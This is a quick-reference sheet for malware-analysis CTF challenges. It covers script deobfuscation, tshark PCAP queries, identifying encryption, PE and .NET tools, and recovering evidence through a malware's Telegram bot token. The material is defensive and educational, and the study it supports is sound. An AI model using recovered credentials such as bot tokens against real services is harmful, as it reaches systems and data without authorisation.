CTF Malware & Network Analysis Quick reference for malware analysis CTF challenges. Each technique has a one-liner here; see supporting files for full details with code. Additional Resources scripts-and-obfuscation.md - JavaScript deobfuscation, PowerShell analysis, eval/base64 decoding, junk code detection, hex payloads, Debian package analysis c2-and-protocols.md - C2 traffic patterns, custom crypto protocols, RC4 WebSocket, DNS-based C2, network indicators, PCAP analysis, AES-CBC, encryption ID, Telegram bot recovery pe-and-dotnet.md - PE analysis (peframe, pe-sieve, pestudio), .NET analysis (dnSpy, AsmResolver), LimeRAT extraction, sandbox evasion, malware config extraction, PyInstaller+PyArmor Obfuscated Scripts Replace eval / bash with echo to print underlying code; extract base64/hex blobs and analyze with file . See scripts-and-obfuscation.md . JavaScript & PowerShell Deobfuscation JS: Replace eval with console.log , decode unescape() , atob() , String.fromCharCode() . PowerShell: Decode -enc base64, replace IEX with output. See scripts-and-obfuscation.md . Junk Code Detection NOP sleds, push/pop pairs, dead writes, unconditional jumps to next instruction. Filter to extract real call targets. See scripts-and-obfuscation.md . PCAP & Network Analysis tshark -r file.pcap -Y "tcp.stream eq X" -T fields -e tcp.payload Look for C2 on unusual ports. Extract IPs/domains with strings | grep . See c2-and-protocols.md . Custom Crypto Protocols Stream ciphers share keystream state for both directions; concatenate ALL payloads chronologically. ChaCha20 keystream extraction: send nullbytes (0 XOR anything = anything). See c2-and-protocols.md . C2 Traffic Patterns Beaconing, DGA, DNS tunneling, HTTP(S) with custom headers, encoded payloads. See c2-and-protocols.md . RC4-Encrypted WebSocket C2 Remap port with tcprewrite , add RSA key for TLS decryption, find RC4 key in binary. See c2-and-protocols.md . Identifying Encryption Algorithms AES: 0x637c777b S-box; ChaCha20: expand 32-byte k ; TEA/XTEA: 0x9E3779B9 ; RC4: sequential S-box init. See c2-and-protocols.md . AES-CBC in Malware Key = MD5/SHA256 of hardcoded string; IV = first 16 bytes of ciphertext. See c2-and-protocols.md . PE Analysis peframe malware.exe

Quick triage

pe-sieve

Runtime analysis

pestudio

Static analysis (Windows)

See pe-and-dotnet.md . .NET Malware Analysis Use dnSpy/ILSpy for decompilation; AsmResolver for programmatic analysis. LimeRAT C2: AES-256-ECB with MD5-derived key. See pe-and-dotnet.md . Malware Configuration Extraction Check .data section, PE/.NET resources, registry keys, encrypted config files. See pe-and-dotnet.md . Sandbox Evasion Checks VM detection, debugger detection, timing checks, environment checks, analysis tool detection. See pe-and-dotnet.md . PyInstaller + PyArmor Unpacking pyinstxtractor.py to extract, PyArmor-Unpacker for protected code. See pe-and-dotnet.md . Telegram Bot Evidence Recovery Use bot token from malware source to call getUpdates and getFile APIs. See c2-and-protocols.md . Debian Package Analysis ar -x package.deb && tar -xf control.tar.xz

Check postinst scripts

See scripts-and-obfuscation.md . Network Indicators Quick Reference strings malware | grep -E '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}' tshark -r capture.pcap -Y "dns.qry.name" -T fields -e dns.qry.name | sort -u